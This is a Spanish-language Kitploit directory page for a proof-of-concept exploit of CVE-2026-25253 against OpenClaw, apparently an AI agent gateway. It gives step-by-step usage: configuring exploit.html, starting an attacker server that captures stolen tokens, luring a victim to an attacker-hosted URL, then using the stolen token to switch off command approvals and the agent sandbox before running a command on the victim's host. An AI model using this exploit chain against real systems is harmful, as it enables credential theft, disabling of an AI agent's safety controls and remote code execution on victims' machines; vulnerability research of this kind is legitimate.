Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-25253-research — Prueba de concepto del exploit para CVE-2026-25253, que demuestra RCE con un solo clic en OpenClaw mediante secuestro de WebSocket entre sitios (Cross-Site WebSocket Hijacking). Incluye servidor atacante y payload basado en navegador para robar tokens y ejecutar comandos. | Kitploit
Herramientas/GitHubGitHub/al4n4n/cve-2026-25253-research
ReconocimientoExplotaciónExplotación de Aplicaciones WebSeguridad WebRed TeamingDesarrollo de Payloads
GitHubal4n4n/cve-2026-25253-research

CVE-2026-25253-research

Prueba de concepto del exploit para CVE-2026-25253, que demuestra RCE con un solo clic en OpenClaw mediante secuestro de WebSocket entre sitios (Cross-Site WebSocket Hijacking). Incluye servidor atacante y payload basado en navegador para robar tokens y ejecutar comandos.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
71hace 6 mesesAún no revisado

Prueba de Concepto CVE-2026-25253

RCE con un solo clic en OpenClaw mediante Cross-Site WebSocket Hijacking.

AVISO LEGAL: Este código se proporciona únicamente con fines de investigación de seguridad autorizada y educativos. El uso de este código contra sistemas sin permiso escrito explícito es ilegal y poco ético. El autor no asume ninguna responsabilidad por el mal uso.

Blog

Lea el análisis detallado para obtener un desglose a nivel de código fuente de esta vulnerabilidad y cómo se construyó este PoC.

Requisitos previos

  • Node.js (v18 o posterior)
  • Una instancia de OpenClaw en ejecución con el Gateway en la máquina de la víctima (por defecto: localhost:18789)
  • La víctima debe tener un token de autenticación activo almacenado en su navegador (es decir, que haya utilizado la interfaz de Control anteriormente)

Instalar Node.js

macOS (Homebrew):

root@kitploit:~
brew install node

Ubuntu / Debian:

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_22.x | sudo -E bash -
sudo apt-get install -y nodejs

Windows:

Descargue el instalador desde https://nodejs.org/ y siga las instrucciones.

Verifique la instalación:

root@kitploit:~
node -v
npm -v

Configuración

root@kitploit:~
git clone https://github.com/al4n4n/CVE-2026-25253-research.git
cd CVE-2026-25253-research
npm install

Esto instala la única dependencia: ws (biblioteca WebSocket).

Configuración

Edite la parte superior de exploit.html para que coincida con su entorno:

root@kitploit:~
const LOCAL_SCHEME = 'http';                // Esquema de la interfaz de Control de la víctima
const GATEWAY_URL = 'ws://127.0.0.1:18789'; // Gateway local de la víctima
const ATTACKER_WS_PORT = 8080;              // Puerto WS del atacante (debe coincidir con attacker-server.js)
const ATTACKER_SCHEME = 'ws';               // Use 'wss' si está detrás de TLS
const COMMAND = 'touch /tmp/success';       // Comando a ejecutar en el host de la víctima

Edite la parte superior de attacker-server.js si necesita puertos diferentes:

root@kitploit:~
const HTTP_PORT = 3000;  // Sirve exploit.html
const WS_PORT = 8080;    // Captura tokens robados

Ejecución

1. Inicie el servidor del atacante

root@kitploit:~
node attacker-server.js

Debería ver:

root@kitploit:~
============================================================
CVE-2026-25253 Attack Server
============================================================

[HTTP]  Exploit page: http://0.0.0.0:3000/exploit.html
[WS]    Token capture: ws://0.0.0.0:8080

Waiting for victim...

2. Atraiga a la víctima

Envíe a la víctima la siguiente URL (reemplace <ATTACKER_IP> con su IP):

root@kitploit:~
http://<ATTACKER_IP>:3000/exploit.html

La víctima debe abrir este enlace en un navegador donde haya utilizado previamente la interfaz de Control de OpenClaw (para que el token de autenticación exista en localStorage).

3. Qué sucede

root@kitploit:~
┌──────────────────────────────────────────────────────────────────────────┐
│                          EXPLOIT FLOW                                    │
├──────────────────────────────────────────────────────────────────────────┤
│                                                                          │
│  1. Victim visits http://<attacker>:3000/exploit.html                    │
│     │                                                                    │
│  2. Page opens popup: http://127.0.0.1:18789?gatewayUrl=ws://<attacker>  │
│     │                                                                    │
│  3. Control UI in popup reads token from localStorage                    │
│     and sends it to attacker's WS server via gatewayUrl                  │
│     │                                                                    │
│  4. Attacker server rejects first connect (device token)                 │
│     Control UI retries with settings token → CAPTURED                    │
│     │                                                                    │
│  5. exploit.html opens its OWN WebSocket to ws://127.0.0.1:18789         │
│     (Cross-Site WebSocket Hijacking - no Origin validation)              │
│     │                                                                    │
│  6. Authenticates with stolen token, disables security:                  │
│     • exec.approvals.set → ask: "off"                                    │
│     • config.patch → host: "gateway", sandbox.mode: "off"                │
│     │                                                                    │
│  7. Sends agent command → RCE on victim host                             │
│                                                                          │
└──────────────────────────────────────────────────────────────────────────┘

4. Verificación

En la máquina de la víctima, compruebe si el comando se ejecutó:

root@kitploit:~
ls -la /tmp/success

Archivos

ArchivoDescripción
attacker-server.jsServidor HTTP (sirve la página de exploit) + servidor WebSocket (captura tokens robados)
exploit.htmlCarga útil de exploit basada en navegador que roba tokens, secuestra WebSocket, desactiva la seguridad y ejecuta comandos
Descargar herramienta
package.jsonDependencias de Node.js (ws)